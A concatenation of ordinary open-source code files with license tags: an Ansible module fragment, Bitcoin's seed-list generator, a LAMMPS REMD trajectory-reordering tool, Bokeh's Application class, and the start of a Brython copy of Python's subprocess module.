existing = invoke('get_existing', module, args) end_state = existing proposed = dict((k, v) for k, v in module.params.iteritems() if v is not None and k in args) 
result = {} candidate = CustomNetworkConfig(indent=3) invoke('get_commands', module, existing, proposed, candidate) try: response = load_config(module, candidate) result.update(response) except ShellError: exc = get_exception() module.fail_json(msg=str(exc)) result['connected'] = module.connected if module._verbosity > 0: end_state = invoke('get_existing', module, args) result['end_state'] = end_state result['existing'] = existing result['proposed'] = proposed if WARNINGS: result['warnings'] = WARNINGS module.exit_json(**result) if __name__ == '__main__': main()
gpl-3.0
jakeva/bitcoin-pwcheck
share/seeds/generate-seeds.py
79
4297
#!/usr/bin/python # Copyright (c) 2014 Wladmir J. van der Laan # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. ''' Script to generate list of seed nodes for chainparams.cpp. This script expects two text files in the directory that is passed as an argument: nodes_main.txt nodes_test.txt These files must consist of lines in the format <ip> <ip>:<port> [<ipv6>] [<ipv6>]:<port> <onion>.onion 0xDDBBCCAA (IPv4 little-endian old pnSeeds format) The output will be two data structures with the peers in binary format: static SeedSpec6 pnSeed6_main[]={ ... } static SeedSpec6 pnSeed6_test[]={ ... } These should be pasted into `src/chainparamsseeds.h`. ''' from __future__ import print_function, division from base64 import b32decode from binascii import a2b_hex import sys, os import re # ipv4 in ipv6 prefix pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff]) # tor-specific ipv6 prefix pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43]) def name_to_ipv6(addr): if len(addr)>6 and addr.endswith('.onion'): vchAddr = b32decode(addr[0:-6], True) if len(vchAddr) != 16-len(pchOnionCat): raise ValueError('Invalid onion %s' % s) return pchOnionCat + vchAddr elif '.' 
in addr: # IPv4 return pchIPv4 + bytearray((int(x) for x in addr.split('.'))) elif ':' in addr: # IPv6 sub = [[], []] # prefix, suffix x = 0 addr = addr.split(':') for i,comp in enumerate(addr): if comp == '': if i == 0 or i == (len(addr)-1): # skip empty component at beginning or end continue x += 1 # :: skips to suffix assert(x < 2) else: # two bytes per component val = int(comp, 16) sub[x].append(val >> 8) sub[x].append(val & 0xff) nullbytes = 16 - len(sub[0]) - len(sub[1]) assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0)) return bytearray(sub[0] + ([0] * nullbytes) + sub[1]) elif addr.startswith('0x'): # IPv4-in-little-endian return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:]))) else: raise ValueError('Could not parse address %s' % addr) def parse_spec(s, defaultport): match = re.match('\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s) if match: # ipv6 host = match.group(1) port = match.group(2) else: (host,_,port) = s.partition(':') if not port: port = defaultport else: port = int(port) host = name_to_ipv6(host) return (host,port) def process_nodes(g, f, structname, defaultport): g.write('static SeedSpec6 %s[] = {\n' % structname) first = True for line in f: comment = line.find('#') if comment != -1: line = line[0:comment] line = line.strip() if not line: continue if not first: g.write(',\n') first = False (host,port) = parse_spec(line, defaultport) hoststr = ','.join(('0x%02x' % b) for b in host) g.write(' {{%s}, %i}' % (hoststr, port)) g.write('\n};\n') def main(): if len(sys.argv)<2: print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr) exit(1) g = sys.stdout indir = sys.argv[1] g.write('#ifndef BITCOIN_CHAINPARAMSSEEDS_H\n') g.write('#define BITCOIN_CHAINPARAMSSEEDS_H\n') g.write('/**\n') g.write(' * List of fixed seed nodes for the bitcoin network\n') g.write(' * AUTOGENERATED by share/seeds/generate-seeds.py\n') g.write(' *\n') g.write(' * Each line contains a 16-byte IPv6 address and a port.\n') g.write(' * IPv4 as well as 
onion addresses are wrapped inside a IPv6 address accordingly.\n') g.write(' */\n') with open(os.path.join(indir,'nodes_main.txt'),'r') as f: process_nodes(g, f, 'pnSeed6_main', 8333) g.write('\n') with open(os.path.join(indir,'nodes_test.txt'),'r') as f: process_nodes(g, f, 'pnSeed6_test', 18333) g.write('#endif // BITCOIN_CHAINPARAMSSEEDS_H\n') if __name__ == '__main__': main()
mit
PabloPiaggi/lammps
tools/replica/reorder_remd_traj.py
3
20165
#!/usr/bin/env python """ LAMMPS Replica Exchange Molecular Dynamics (REMD) trajectories are arranged by replica, i.e., each trajectory is a continuous replica that records all the ups and downs in temperature. However, often the requirement is trajectories that are continuous in temperature, which is achieved by this tool. Author: Tanmoy Sanyal, Shell lab, Chemical Engineering, UC Santa Barbara Email: tanmoy dot 7989 at gmail dot com Usage ----- To get detailed information about the arguments, flags, etc use: python reorder_remd_traj.py -h or python reorder_remd_traj.py --help Features of this script ----------------------- a) reorder LAMMPS REMD trajectories by temperature keeping only desired frames. Note: this only handles LAMMPS format trajectories (i.e. .lammpstrj format) Trajectories can be gzipped or bz2-compressed. The trajectories are assumed to be named as <prefix>.%d.lammpstrj[.gz or .bz2] b) (optionally) calculate configurational weights for each frame at each temperature if potential energies are supplied. But this if for the canonical (NVT) ensemble only. Dependencies ------------ mpi4py pymbar (for getting configurational weights) tqdm (for printing pretty progress bars) StringIO (or io if in Python 3.x) """ import os, numpy as np, argparse, time, pickle from scipy.special import logsumexp from mpi4py import MPI from tqdm import tqdm import gzip, bz2 try: # python-2 from StringIO import StringIO as IOBuffer except ImportError: # python-3 from io import BytesIO as IOBuffer #### INITIALISE MPI #### # (note that all output on screen will be printed only on the ROOT proc) ROOT = 0 comm = MPI.COMM_WORLD me = comm.rank # my proc id nproc = comm.size #### HELPER FUNCTIONS #### def _get_nearest_temp(temps, query_temp): """ Helper function to get the nearest temp in a list from a given query_temp :param temps: list of temps. 
:param query_temp: query temp Returns: idx: index of nearest temp in the list out_temp: nearest temp from the list """ if isinstance(temps, list): temps = np.array(temps) return temps[np.argmin(np.abs(temps-query_temp))] def readwrite(trajfn, mode): """ Helper function for input/output LAMMPS traj files. Trajectories may be plain text, .gz or .bz2 compressed. :param trajfn: name of LAMMPS traj :param mode: "r" ("w") and "rb" ("wb") depending on read or write Returns: file pointer """ if trajfn.endswith(".gz"): of = gzip.open(trajfn, mode) #return gzip.GzipFile(trajfn, mode) elif trajfn.endswith(".bz2"): of = bz2.open(trajfn, mode) #return bz2.BZ2File(trajfn, mode) else: of = open(trajfn, mode) return of def get_replica_frames(logfn, temps, nswap, writefreq): """ Get a list of frames from each replica that is at a particular temp. Do this for all temps. :param logfn: master LAMMPS log file that contains the temp swap history of all replicas :param temps: list of all temps used in the REMD simulation. :param nswap: swap frequency of the REMD simulation :param writefreq: traj dump frequency in LAMMPS Returns: master_frametuple_dict: dict containing a tuple (replica #, frame #) for each temp. """ n_rep = len(temps) swap_history = np.loadtxt(logfn, skiprows = 3) master_frametuple_dict = dict( (n, []) for n in range(n_rep) ) # walk through the replicas print("Getting frames from all replicas at temperature:") for n in range(n_rep): print("%3.2f K" % temps[n]) rep_inds = [np.where(x[1:] == n)[0][0] for x in swap_history] # case-1: when frames are dumped faster than temp. swaps if writefreq <= nswap: for ii, i in enumerate(rep_inds[:-1]): start = int(ii * nswap / writefreq) stop = int( (ii+1) * nswap / writefreq) [master_frametuple_dict[n].append( (i,x) ) \ for x in range(start, stop)] # case-2: when temps. 
are swapped faster than dumping frames else: nskip = int(writefreq / nswap) [master_frametuple_dict[n].append( (i,ii) ) \ for ii, i in enumerate(rep_inds[0::nskip])] return master_frametuple_dict def get_byte_index(rep_inds, byteindfns, intrajfns): """ Get byte indices from (un-ordered) trajectories. :param rep_inds: indices of replicas to process on this proc :param byteindsfns: list of filenames that will contain the byte indices :param intrajfns: list of (unordered) input traj filenames """ for n in rep_inds: # check if the byte indices for this traj has aleady been computed if os.path.isfile(byteindfns[n]): continue # extract bytes fobj = readwrite(intrajfns[n], "rb") byteinds = [ [0,0] ] # place file pointer at first line nframe = 0 first_line = fobj.readline() cur_pos = fobj.tell() # status printed only for replica read on root proc # this assumes that each proc takes roughly the same time if me == ROOT: pb = tqdm(desc = "Reading replicas", leave = True, position = ROOT + 2*me, unit = "B/replica", unit_scale = True, unit_divisor = 1024) # start crawling through the bytes while True: next_line = fobj.readline() if len(next_line) == 0: break # this will only work with lammpstrj traj format. # this condition essentially checks periodic recurrences # of the token TIMESTEP. Each time it is found, # we have crawled through a frame (snapshot) if next_line == first_line: nframe += 1 byteinds.append( [nframe, cur_pos] ) if me == ROOT: pb.update() cur_pos = fobj.tell() if me == ROOT: pb.update(0) if me == ROOT: pb.close() # take care of the EOF cur_pos = fobj.tell() byteinds.append( [nframe+1, cur_pos] ) # dummy index for the EOF # write to file np.savetxt(byteindfns[n], np.array(byteinds), fmt = "%d") # close the trajfile object fobj.close() return def write_reordered_traj(temp_inds, byte_inds, outtemps, temps, frametuple_dict, nprod, writefreq, outtrajfns, infobjs): """ Reorders trajectories by temp. 
and writes them to disk :param temp_inds: list index of temps (in the list of all temps) for which reordered trajs will be produced on this proc. :param byte_inds: dict containing the (previously stored) byte indices for each replica file (key = replica number) :param outtemps: list of all temps for which to produce reordered trajs. :param temps: list of all temps used in the REMD simulation. :param outtrajfns: list of filenames for output (ordered) trajs. :param frametuple_dict: dict containing a tuple (replica #, frame #) for each temp. :param nprod: number of production timesteps. Last (nprod / writefreq) frames from the end will be written to disk. :param writefreq: traj dump frequency in LAMMPS :param infobjs: list of file pointers to input (unordered) trajs. """ nframes = int(nprod / writefreq) for n in temp_inds: # open string-buffer and file buf = IOBuffer() of = readwrite(outtrajfns[n], "wb") # get frames abs_temp_ind = np.argmin( abs(temps - outtemps[n]) ) frametuple = frametuple_dict[abs_temp_ind][-nframes:] # write frames to buffer if me == ROOT: pb = tqdm(frametuple, desc = ("Buffering trajectories for writing"), leave = True, position = ROOT + 2*me, unit = 'frame/replica', unit_scale = True) iterable = pb else: iterable = frametuple for i, (rep, frame) in enumerate(iterable): infobj = infobjs[rep] start_ptr = int(byte_inds[rep][frame,1]) stop_ptr = int(byte_inds[rep][frame+1,1]) byte_len = stop_ptr - start_ptr infobj.seek(start_ptr) buf.write(infobj.read(byte_len)) if me == ROOT: pb.close() # write buffer to disk if me == ROOT: print("Writing buffer to file") of.write(buf.getvalue()) of.close() buf.close() for i in infobjs: i.close() return def get_canonical_logw(enefn, frametuple_dict, temps, nprod, writefreq, kB): """ Gets configurational log-weights (logw) for each frame and at each temp. from the REMD simulation. ONLY WRITTEN FOR THE CANONICAL (NVT) ensemble. 
This weights can be used to calculate the ensemble averaged value of any simulation observable X at a given temp. T : <X> (T) = \sum_{k=1, ntemps} \sum_{n=1, nframes} w[idx][k,n] X[k,n] where nframes is the number of frames to use from each *reordered* traj :param enefn: ascii file (readable by numpy.loadtxt) containing an array u[r,n] of *total* potential energy for the n-th frame for the r-th replica. :param frametuple_dict: dict containing a tuple (replica #, frame #) for each temp. :param temps: array of temps. used in the REMD simulation :param nprod: number of production timesteps. Last (nprod / writefreq) frames from the end will be written to disk. :param writefreq: traj dump frequency in LAMMPS :param kB : Boltzmann constant to set the energy scale. Default is in kcal/mol Returns: logw: dict, logw[l][k,n] gives the log weights from the n-th frame of the k-th temp. *ordered* trajectory to reweight to the l-th temp. """ try: import pymbar except ImportError: print(""" Configurational log-weight calculation requires pymbar. Here are some options to install it: conda install -c omnia pymbar pip install --user pymbar sudo pip install pymbar To install the dev. version directly from github, use: pip install pip install git+https://github.com/choderalab/pymbar.git """) u_rn = np.loadtxt(enefn) ntemps = u_rn.shape[0] # number of temps. nframes = int(nprod / writefreq) # number of frames at each temp. # reorder the temps u_kn = np.zeros([ntemps, nframes], float) for k in range(ntemps): frame_tuple = frametuple_dict[k][-nframes:] for i, (rep, frame) in enumerate(frame_tuple): u_kn[k, i] = u_rn[rep, frame] # prep input for pymbar #1) array of frames at each temp. nframes_k = nframes * np.ones(ntemps, np.uint8) #2) inverse temps. 
for chosen energy scale beta_k = 1.0 / (kB * temps) #3) get reduced energies (*ONLY FOR THE CANONICAL ENSEMBLE*) u_kln = np.zeros([ntemps, ntemps, nframes], float) for k in range(ntemps): u_kln[k] = np.outer(beta_k, u_kn[k]) # run pymbar and extract the free energies print("\nRunning pymbar...") mbar = pymbar.mbar.MBAR(u_kln, nframes_k, verbose = True) f_k = mbar.f_k # (1 x k array) # calculate the log-weights print("\nExtracting log-weights...") log_nframes = np.log(nframes) logw = dict( (k, np.zeros([ntemps, nframes], float)) for k in range(ntemps) ) # get log-weights to reweight to this temp. for k in range(ntemps): for n in range(nframes): num = -beta_k[k] * u_kn[k,n] denom = f_k - beta_k[k] * u_kn[k,n] for l in range(ntemps): logw[l][k,n] = num - logsumexp(denom) - log_nframes return logw #### MAIN WORKFLOW #### if __name__ == "__main__": # accept user inputs parser = argparse.ArgumentParser(description = __doc__, formatter_class = argparse.RawDescriptionHelpFormatter) parser.add_argument("prefix", help = "Prefix of REMD LAMMPS trajectories.\ Supply full path. Trajectories assumed to be named as \ <prefix>.%%d.lammpstrj. \ Can be in compressed (.gz or .bz2) format. \ This is a required argument") parser.add_argument("-logfn", "--logfn", default = "log.lammps", help = "LAMMPS log file that contains swap history \ of temperatures among replicas. 
\ Default = 'lammps.log'") parser.add_argument("-tfn", "--tempfn", default = "temps.txt", help = "ascii file (readable by numpy.loadtxt) with \ the temperatures used in the REMD simulation.") parser.add_argument("-ns", "--nswap", type = int, help = "Swap frequency used in LAMMPS temper command") parser.add_argument("-nw", "--nwrite", type = int, default = 1, help = "Trajectory writing frequency used \ in LAMMPS dump command") parser.add_argument("-np", "--nprod", type = int, default = 0, help = "Number of timesteps to save in the reordered\ trajectories.\ This should be in units of the LAMMPS timestep") parser.add_argument("-logw", "--logw", action = 'store_true', help = "Supplying this flag \ calculates *canonical* (NVT ensemble) log weights") parser.add_argument("-e", "--enefn", help = "File that has n_replica x n_frames array\ of total potential energies") parser.add_argument("-kB", "--boltzmann_const", type = float, default = 0.001987, help = "Boltzmann constant in appropriate units. \ Default is kcal/mol") parser.add_argument("-ot", "--out_temps", nargs = '+', type = np.float64, help = "Reorder trajectories at these temperatures.\n \ Default is all temperatures used in the simulation") parser.add_argument("-od", "--outdir", default = ".", help = "All output will be saved to this directory") # parse inputs args = parser.parse_args() traj_prefix = os.path.abspath(args.prefix) logfn = os.path.abspath(args.logfn) tempfn = os.path.abspath(args.tempfn) nswap = args.nswap writefreq = args.nwrite nprod = args.nprod enefn = args.enefn if not enefn is None: enefn = os.path.abspath(enefn) get_logw = args.logw kB = args.boltzmann_const out_temps = args.out_temps outdir = os.path.abspath(args.outdir) if not os.path.isdir(outdir): if me == ROOT: os.mkdir(outdir) # check that all input files are present (only on the ROOT proc) if me == ROOT: if not os.path.isfile(tempfn): raise IOError("Temperature file %s not found." 
% tempfn) elif not os.path.isfile(logfn): raise IOError("LAMMPS log file %s not found." % logfn) elif get_logw and not os.path.isfile(enefn): raise IOError("Canonical log-weight calculation requested but\ energy file %s not found" % enefn) # get (unordered) trajectories temps = np.loadtxt(tempfn) ntemps = len(temps) intrajfns = ["%s.%d.lammpstrj" % (traj_prefix, k) for k in range(ntemps)] # check if the trajs. (or their zipped versions are present) for i in range(ntemps): this_intrajfn = intrajfns[i] x = this_intrajfn + ".gz" if os.path.isfile(this_intrajfn): continue elif os.path.isfile(this_intrajfn + ".gz"): intrajfns[i] = this_intrajfn + ".gz" elif os.path.isfile(this_intrajfn + ".bz2"): intrajfns[i] = this_intrajfn + ".bz2" else: if me == ROOT: raise IOError("Trajectory for replica # %d missing" % i) # set output filenames outprefix = os.path.join(outdir, traj_prefix.split('/')[-1]) outtrajfns = ["%s.%3.2f.lammpstrj.gz" % \ (outprefix, _get_nearest_temp(temps, t)) \ for t in out_temps] byteindfns = [os.path.join(outdir, ".byteind_%d.gz" % k) \ for k in range(ntemps)] frametuplefn = outprefix + '.frametuple.pickle' if get_logw: logwfn = outprefix + ".logw.pickle" # get a list of all frames at a particular temp visited by each replica # this is fast so run only on ROOT proc. master_frametuple_dict = {} if me == ROOT: master_frametuple_dict = get_replica_frames(logfn = logfn, temps = temps, nswap = nswap, writefreq = writefreq) # save to a pickle from the ROOT proc with open(frametuplefn, 'wb') as of: pickle.dump(master_frametuple_dict, of) # broadcast to all procs master_frametuple_dict = comm.bcast(master_frametuple_dict, root = ROOT) # define a chunk of replicas to process on each proc CHUNKSIZE_1 = int(ntemps/nproc) if me < nproc - 1: my_rep_inds = range( (me*CHUNKSIZE_1), (me+1)*CHUNKSIZE_1 ) else: my_rep_inds = range( (me*CHUNKSIZE_1), ntemps ) # get byte indices from replica (un-ordered) trajs. 
in parallel get_byte_index(rep_inds = my_rep_inds, byteindfns = byteindfns, intrajfns = intrajfns) # block until all procs have finished comm.barrier() # open all replica files for reading infobjs = [readwrite(i, "rb") for i in intrajfns] # open all byteindex files byte_inds = dict( (i, np.loadtxt(fn)) for i, fn in enumerate(byteindfns) ) # define a chunk of output trajs. to process for each proc. # # of reordered trajs. to write may be less than the total # of replicas # which is usually equal to the requested nproc. If that is indeed the case, # retire excess procs n_out_temps = len(out_temps) CHUNKSIZE_2 = int(n_out_temps / nproc) if CHUNKSIZE_2 == 0: nproc_active = n_out_temps CHUNKSIZE_2 = 1 if me == ROOT: print("\nReleasing %d excess procs" % (nproc - nproc_active)) else: nproc_active = nproc if me < nproc_active-1: my_temp_inds = range( (me*CHUNKSIZE_2), (me+1)*CHUNKSIZE_1 ) else: my_temp_inds = range( (me*CHUNKSIZE_2), n_out_temps) # retire the excess procs # dont' forget to close any open file objects if me >= nproc_active: for fobj in infobjs: fobj.close() exit() # write reordered trajectories to disk from active procs in parallel write_reordered_traj(temp_inds = my_temp_inds, byte_inds = byte_inds, outtemps = out_temps, temps = temps, frametuple_dict = master_frametuple_dict, nprod = nprod, writefreq = writefreq, outtrajfns = outtrajfns, infobjs = infobjs) # calculate canonical log-weights if requested # usually this is very fast so retire all but the ROOT proc if not get_logw: exit() if not me == ROOT: exit() logw = get_canonical_logw(enefn = enefn, temps = temps, frametuple_dict = master_frametuple_dict, nprod = nprod, writefreq = writefreq, kB = kB) # save the logweights to a pickle with open(logwfn, 'wb') as of: pickle.dump(logw, of)
gpl-2.0
maxalbert/bokeh
bokeh/application/application.py
2
1422
''' ''' from __future__ import absolute_import import logging log = logging.getLogger(__name__) from ..document import Document class Application(object): ''' An Application is a factory for Document instances. ''' def __init__(self, *handlers): self._handlers = list(handlers) # TODO (havocp) should this potentially create multiple documents? # or does multiple docs mean multiple Application? def create_document(self): ''' Loads a new document using the Application's handlers to fill it in. ''' doc = Document() for h in self._handlers: # TODO (havocp) we need to check the 'failed' flag on each handler # and build a composite error display. h.modify_document(doc) if h.failed: log.error("Error running application handler %r: %s %s ", h, h.error, h.error_detail) # A future server setting could make it configurable whether to do this, # since it has some performance impact probably. Let's see if we need to. doc.validate() return doc def add(self, handler): ''' Add a handler to the pipeline used to initialize new documents. Args: handler (Handler) : a handler to process this Application ''' self._handlers.append(handler) @property def handlers(self): return tuple(self._handlers)
bsd-3-clause
40223240/2015cdb_g3_40223240
static/Brython3.1.1-20150328-091302/Lib/subprocess.py
728
67282
# subprocess - Subprocesses with accessible I/O streams # # For more information about this module, see PEP 324. # # Copyright (c) 2003-2005 by Peter Astrand <astrand@lysator.liu.se> # # Licensed to PSF under a Contributor Agreement. # See http://www.python.org/2.4/license for licensing details. r"""subprocess - Subprocesses with accessible I/O streams This module allows you to spawn processes, connect to their input/output/error pipes, and obtain their return codes. This module intends to replace several other, older modules and functions, like: os.system os.spawn* Information about how the subprocess module can be used to replace these modules and functions can be found below. Using the subprocess module =========================== This module defines one class called Popen: class Popen(args, bufsize=-1, executable=None, stdin=None, stdout=None, stderr=None, preexec_fn=None, close_fds=True, shell=False, cwd=None, env=None, universal_newlines=False, startupinfo=None, creationflags=0, restore_signals=True, start_new_session=False, pass_fds=()): Arguments are: args should be a string, or a sequence of program arguments. The program to execute is normally the first item in the args sequence or string, but can be explicitly set by using the executable argument. On POSIX, with shell=False (default): In this case, the Popen class uses os.execvp() to execute the child program. args should normally be a sequence. A string will be treated as a sequence with the string as the only item (the program to execute). On POSIX, with shell=True: If args is a string, it specifies the command string to execute through the shell. If args is a sequence, the first item specifies the command string, and any additional items will be treated as additional shell arguments. On Windows: the Popen class uses CreateProcess() to execute the child program, which operates on strings. If args is a sequence, it will be converted to a string using the list2cmdline method. 
Please note that not all MS Windows applications interpret the command line the same way: The list2cmdline is designed for applications using the same rules as the MS C runtime. bufsize will be supplied as the corresponding argument to the io.open() function when creating the stdin/stdout/stderr pipe file objects: 0 means unbuffered (read & write are one system call and can return short), 1 means line buffered, any other positive value means use a buffer of approximately that size. A negative bufsize, the default, means the system default of io.DEFAULT_BUFFER_SIZE will be used. stdin, stdout and stderr specify the executed programs' standard input, standard output and standard error file handles, respectively. Valid values are PIPE, an existing file descriptor (a positive integer), an existing file object, and None. PIPE indicates that a new pipe to the child should be created. With None, no redirection will occur; the child's file handles will be inherited from the parent. Additionally, stderr can be STDOUT, which indicates that the stderr data from the applications should be captured into the same file handle as for stdout. On POSIX, if preexec_fn is set to a callable object, this object will be called in the child process just before the child is executed. The use of preexec_fn is not thread safe, using it in the presence of threads could lead to a deadlock in the child process before the new executable is executed. If close_fds is true, all file descriptors except 0, 1 and 2 will be closed before the child process is executed. The default for close_fds varies by platform: Always true on POSIX. True when stdin/stdout/stderr are None on Windows, false otherwise. pass_fds is an optional sequence of file descriptors to keep open between the parent and child. Providing any pass_fds implicitly sets close_fds to true. if shell is true, the specified command will be executed through the shell. 
If cwd is not None, the current directory will be changed to cwd before the child is executed. On POSIX, if restore_signals is True all signals that Python sets to SIG_IGN are restored to SIG_DFL in the child process before the exec. Currently this includes the SIGPIPE, SIGXFZ and SIGXFSZ signals. This parameter does nothing on Windows. On POSIX, if start_new_session is True, the setsid() system call will be made in the child process prior to executing the command. If env is not None, it defines the environment variables for the new process. If universal_newlines is false, the file objects stdin, stdout and stderr are opened as binary files, and no line ending conversion is done. If universal_newlines is true, the file objects stdout and stderr are opened as a text files, but lines may be terminated by any of '\n', the Unix end-of-line convention, '\r', the old Macintosh convention or '\r\n', the Windows convention. All of these external representations are seen as '\n' by the Python program. Also, the newlines attribute of the file objects stdout, stdin and stderr are not updated by the communicate() method. The startupinfo and creationflags, if given, will be passed to the underlying CreateProcess() function. They can specify things such as appearance of the main window and priority for the new process. (Windows only) This module also defines some shortcut functions: call(*popenargs, **kwargs): Run command with arguments. Wait for command to complete, then return the returncode attribute. The arguments are the same as for the Popen constructor. Example: >>> retcode = subprocess.call(["ls", "-l"]) check_call(*popenargs, **kwargs): Run command with arguments. Wait for command to complete. If the exit code was zero then return, otherwise raise CalledProcessError. The CalledProcessError object will have the return code in the returncode attribute. The arguments are the same as for the Popen constructor. 
Example: >>> subprocess.check_call(["ls", "-l"]) 0 getstatusoutput(cmd): Return (status, output) of executing cmd in a shell. Execute the string 'cmd' in a shell with os.popen() and return a 2-tuple (status, output). cmd is actually run as '{ cmd ; } 2>&1', so that the returned output will contain output or error messages. A trailing newline is stripped from the output. The exit status for the command can be interpreted according to the rules for the C function wait(). Example: >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file or directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: not found') getoutput(cmd): Return output (stdout or stderr) of executing cmd in a shell. Like getstatusoutput(), except the exit status is ignored and the return value is a string containing the command's output. Example: >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' check_output(*popenargs, **kwargs): Run command with arguments and return its output. If the exit code was non-zero it raises a CalledProcessError. The CalledProcessError object will have the return code in the returncode attribute and output in the output attribute. The arguments are the same as for the Popen constructor. Example: >>> output = subprocess.check_output(["ls", "-l", "/dev/null"]) Exceptions ---------- Exceptions raised in the child process, before the new program has started to execute, will be re-raised in the parent. Additionally, the exception object will have one extra attribute called 'child_traceback', which is a string containing traceback information from the child's point of view. The most common exception raised is OSError. This occurs, for example, when trying to execute a non-existent file. Applications should prepare for OSErrors. A ValueError will be raised if Popen is called with invalid arguments. Exceptions defined within this module inherit from SubprocessError. 
check_call() and check_output() will raise CalledProcessError if the called process returns a non-zero return code. TimeoutExpired be raised if a timeout was specified and expired. Security -------- Unlike some other popen functions, this implementation will never call /bin/sh implicitly. This means that all characters, including shell metacharacters, can safely be passed to child processes. Popen objects ============= Instances of the Popen class have the following methods: poll() Check if child process has terminated. Returns returncode attribute. wait() Wait for child process to terminate. Returns returncode attribute. communicate(input=None) Interact with process: Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate. The optional input argument should be a string to be sent to the child process, or None, if no data should be sent to the child. communicate() returns a tuple (stdout, stderr). Note: The data read is buffered in memory, so do not use this method if the data size is large or unlimited. The following attributes are also available: stdin If the stdin argument is PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None. stdout If the stdout argument is PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None. stderr If the stderr argument is PIPE, this attribute is file object that provides error output from the child process. Otherwise, it is None. pid The process ID of the child process. returncode The child return code. A None value indicates that the process hasn't terminated yet. A negative value -N indicates that the child was terminated by signal N (POSIX only). Replacing older functions with the subprocess module ==================================================== In this section, "a ==> b" means that b can be used as a replacement for a. 
Note: All functions in this section fail (more or less) silently if the executed program cannot be found; this module raises an OSError exception. In the following examples, we assume that the subprocess module is imported with "from subprocess import *". Replacing /bin/sh shell backquote --------------------------------- output=`mycmd myarg` ==> output = Popen(["mycmd", "myarg"], stdout=PIPE).communicate()[0] Replacing shell pipe line ------------------------- output=`dmesg | grep hda` ==> p1 = Popen(["dmesg"], stdout=PIPE) p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE) output = p2.communicate()[0] Replacing os.system() --------------------- sts = os.system("mycmd" + " myarg") ==> p = Popen("mycmd" + " myarg", shell=True) pid, sts = os.waitpid(p.pid, 0) Note: * Calling the program through the shell is usually not required. * It's easier to look at the returncode attribute than the exitstatus. A more real-world example would look like this: try: retcode = call("mycmd" + " myarg", shell=True) if retcode < 0: print("Child was terminated by signal", -retcode, file=sys.stderr) else: print("Child returned", retcode, file=sys.stderr) except OSError as e: print("Execution failed:", e, file=sys.stderr) Replacing os.spawn* ------------------- P_NOWAIT example: pid = os.spawnlp(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg") ==> pid = Popen(["/bin/mycmd", "myarg"]).pid P_WAIT example: retcode = os.spawnlp(os.P_WAIT, "/bin/mycmd", "mycmd", "myarg") ==> retcode = call(["/bin/mycmd", "myarg"]) Vector example: os.spawnvp(os.P_NOWAIT, path, args) ==> Popen([path] + args[1:]) Environment example: os.spawnlpe(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg", env) ==> Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"}) """ import sys mswindows = (sys.platform == "win32") import io import os import time import traceback import gc import signal import builtins import warnings import errno try: from time import monotonic as _time except ImportError: from time import time as 
_time # Exception classes used by this module. class SubprocessError(Exception): pass class CalledProcessError(SubprocessError): """This exception is raised when a process run by check_call() or check_output() returns a non-zero exit status. The exit status will be stored in the returncode attribute; check_output() will also store the output in the output attribute. """ def __init__(self, returncode, cmd, output=None): self.returncode = returncode self.cmd = cmd self.output = output def __str__(self): return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode) class TimeoutExpired(SubprocessError): """This exception is raised when the timeout expires while waiting for a child process. """ def __init__(self, cmd, timeout, output=None): self.cmd = cmd self.timeout = timeout self.output = output def __str__(self): return ("Command '%s' timed out after %s seconds" % (self.cmd, self.timeout)) if mswindows: import threading import msvcrt import _winapi class STARTUPINFO: dwFlags = 0 hStdInput = None hStdOutput = None hStdError = None wShowWindow = 0 class pywintypes: error = IOError else: import select _has_poll = hasattr(select, 'poll') import _posixsubprocess _create_pipe = _posixsubprocess.cloexec_pipe # When select or poll has indicated that the file is writable, # we can write up to _PIPE_BUF bytes without risk of blocking. # POSIX defines PIPE_BUF as >= 512. 
_PIPE_BUF = getattr(select, 'PIPE_BUF', 512) __all__ = ["Popen", "PIPE", "STDOUT", "call", "check_call", "getstatusoutput", "getoutput", "check_output", "CalledProcessError", "DEVNULL"] if mswindows: from _winapi import (CREATE_NEW_CONSOLE, CREATE_NEW_PROCESS_GROUP, STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE, SW_HIDE, STARTF_USESTDHANDLES, STARTF_USESHOWWINDOW) __all__.extend(["CREATE_NEW_CONSOLE", "CREATE_NEW_PROCESS_GROUP", "STD_INPUT_HANDLE", "STD_OUTPUT_HANDLE", "STD_ERROR_HANDLE", "SW_HIDE", "STARTF_USESTDHANDLES", "STARTF_USESHOWWINDOW"]) class Handle(int): closed = False def Close(self, CloseHandle=_winapi.CloseHandle): if not self.closed: self.closed = True CloseHandle(self) def Detach(self): if not self.closed: self.closed = True return int(self) raise ValueError("already closed") def __repr__(self): return "Handle(%d)" % int(self) __del__ = Close __str__ = __repr__ try: MAXFD = os.sysconf("SC_OPEN_MAX") except: MAXFD = 256 # This lists holds Popen instances for which the underlying process had not # exited at the time its __del__ method got called: those processes are wait()ed # for synchronously from _cleanup() when a new Popen object is created, to avoid # zombie processes. _active = [] def _cleanup(): for inst in _active[:]: res = inst._internal_poll(_deadstate=sys.maxsize) if res is not None: try: _active.remove(inst) except ValueError: # This can happen if two threads create a new Popen instance. # It's harmless that it was already removed, so ignore. pass PIPE = -1 STDOUT = -2 DEVNULL = -3 def _eintr_retry_call(func, *args): while True: try: return func(*args) except InterruptedError: continue # XXX This function is only used by multiprocessing and the test suite, # but it's here so that it can be imported when Python is compiled without # threads. 
def _args_from_interpreter_flags():
    """Return a list of command-line arguments reproducing the current
    settings in sys.flags and sys.warnoptions."""
